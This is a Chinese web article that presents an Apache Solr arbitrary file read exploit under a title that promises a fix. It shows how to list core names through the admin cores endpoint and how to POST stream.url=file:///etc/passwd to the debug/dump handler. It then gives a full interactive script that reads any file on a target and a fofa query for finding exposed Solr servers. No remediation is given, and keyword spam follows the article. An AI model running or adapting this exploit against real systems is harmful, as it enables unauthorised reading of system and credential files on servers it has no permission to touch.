千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

Apache-Solr任意文件读取exp怎么解决

发表于:2025-02-22 作者:千家信息网编辑
千家信息网最后更新 2025年02月22日,本篇内容主要讲解"Apache-Solr任意文件读取exp怎么解决",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Apache-Solr任意文件读取exp怎
千家信息网最后更新 2025年02月22日Apache-Solr任意文件读取exp怎么解决

本篇内容主要讲解"Apache-Solr任意文件读取exp怎么解决",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Apache-Solr任意文件读取exp怎么解决"吧!

Apache-Solr任意文件读取exp

漏洞利用方式很简单,但是网上说的不是很完整。

首先我们需要访问:

/solr/admin/cores?indexInfo=false&wt=json

然后看相应数据:

{  "responseHeader":{    "status":0,    "QTime":0},  "initFailures":{},  "status":{    "ingredients":{      "name":"ingredients",      "instanceDir":"/var/solr/data/ingredients",      "dataDir":"/var/solr/data/ingredients/data/",      "config":"solrconfig.xml",      "schema":"schema.xml",      "startTime":"2021-03-18T11:41:26.398Z",      "uptime":211644}}}

差不多这个样子,ingredients就是我们需要的

构造路径:

"/solr/".ins."/debug/dump?param=ContentStreams&wt=json"

ins就是我们得到的实例对象的名称

他们说会返回xml格式的,网上的都是不带wt=json,但是我发现,dump接受这个参数,也会输出json格式

并且我们在上面获取ins的时候是可以判断服务器类型的

上面的话呢应该是:

/solr/ingredients/debug/dump?param=ContentStreams&wt=json

然后是个post数据包,路径有了,内容就是:

stream.url=file:///etc/passwd

然后也会得到一个json,这里就不带结果了

最后附上exp:

#define insqian = "name":"#define inshou = "#define contentqian = "stream":"#define contenthou = "}]function Getinstance(url){        res = HttpGetSafe(url."/solr/admin/cores?indexInfo=false&wt=json","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");        if(StrFindStr(res[0],"initFailures",0) == "-1"){                return "";        }        return GettextMiddle(res[0],insqian,inshou);}function GetFileContent(url,ins,FilePath){        res = HttpPostSafe(url."/solr/".ins."/debug/dump?param=ContentStreams&wt=json","stream.url=file://".FilePath,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");        con = GettextMiddle(res[0],contentqian,contenthou);        return StrReplace(con,"\\n",StrRN());        }function main(args){        print("请输入测试的站点:");        url = input();        ins = Getinstance(url);        if(ins == ""){                print("不存在漏洞");        }else{                print("可能存在漏洞,instanceName:".ins.",请输入要查看的文件名称:");                wb = input();                while(wb != "exit"){                        print(GetFileContent(url,ins,wb));                        wb = input();                }        }}

带一张效果图:

fofa搜索:

app="Apache-Solr"

到此,相信大家对"Apache-Solr任意文件读取exp怎么解决"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

很赞哦!
文件 内容 就是 漏洞 名称 数据 格式 路径 学习 输入 实用 更深 差不多 兴趣 参数 实例 实用性 实际 对象 操作简单 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 mongo创建数据库集合 饥荒为什么连接不到科雷服务器 宁波hpe刀片服务器 和鸿蒙系统通的服务器系统 存放数据库文件数据共享目录 全国网络安全学习中心 湖南做网络安全的企业 风电场网络安全监测装置的作用 软件开发报价预算表 战争雷霆ps5港版什么服务器 wps怎么查不在数据库 网络安全思维导图模板 浙江益童天下网络技术 珠海大唐网络技术有限公司 鄂州天气预报软件开发 甘肃通用网络技术有限公司 手机版最大服务器 A创建数据库时需要继承什么类 海康软件开发面试题 清除华为手机数据库 一千万的数据更新用什么数据库 7g网络技术领先 幽幽美图软件开发 定西有做app软件开发 无线网络加速自制DNS服务器 软件数据库设计 标准 帝国网络安全手抄报 元气骑士服务器网络错误怎么办 三级网络技术难点知识 软件开发项目验收表格

相关文章

0